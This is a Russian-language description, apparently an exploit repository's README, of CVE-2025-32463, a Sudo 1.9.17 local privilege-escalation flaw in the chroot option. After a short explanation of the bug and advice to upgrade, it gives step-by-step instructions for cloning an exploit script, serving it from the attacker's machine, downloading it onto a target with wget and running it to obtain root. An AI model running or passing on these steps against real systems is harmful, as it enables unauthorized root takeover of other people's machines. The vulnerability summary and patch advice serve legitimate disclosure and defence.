
Bash-скрипт эксплойта для CVE-2025-32463, уязвимости локального повышения привилегий в Sudo 1.9.17 через опцию chroot, обеспечивающей доступ root на затронутых системах.
Версия Sudo 1.9.17 содержит критическую уязвимость (CVE-2025-32463), которая позволяет локальным пользователям получить root-доступ, используя опцию chroot, что может привести к серьёзным рискам безопасности. Пользователям рекомендуется обновиться до версии 1.9.17p1 или новее, чтобы устранить эту проблему.
Обзор уязвимости Sudo 1.9.17:-
Уязвимость в версии Sudo 1.9.17, обозначенная как CVE-2025-32463, является критической ошибкой, позволяющей локальным пользователям получить root-доступ. Проблема возникает из-за изменения того, как Sudo обрабатывает опцию --chroot (-R), которая предназначена для изоляции процессов путём изменения их корневого каталога.
Как работает уязвимость:-
Проблема разрешения пути: В версиях с 1.9.14 по 1.9.17 Sudo оценивает опцию --chroot до проверки прав пользователя. Это позволяет злоумышленникам контролировать среду и загружать вредоносные библиотеки.
Шаги эксплуатации:
Я создал bash-скрипт "cwoot.sh", который после выполнения напрямую повышает привилегии до root.
Выполните следующее:
Скачайте скрипт из репозитория: git clone https://github.com/justjoeyking/CVE-2025-32463.git
На своей машине: python3 -m http.server 8080
На целевой машине: wget http://<собственный_IP_адрес>:8080/cwoot.sh
На целевой машине: chmod 755 cwoot.sh
Выполните скрипт на целевой машине: ./cwoot.sh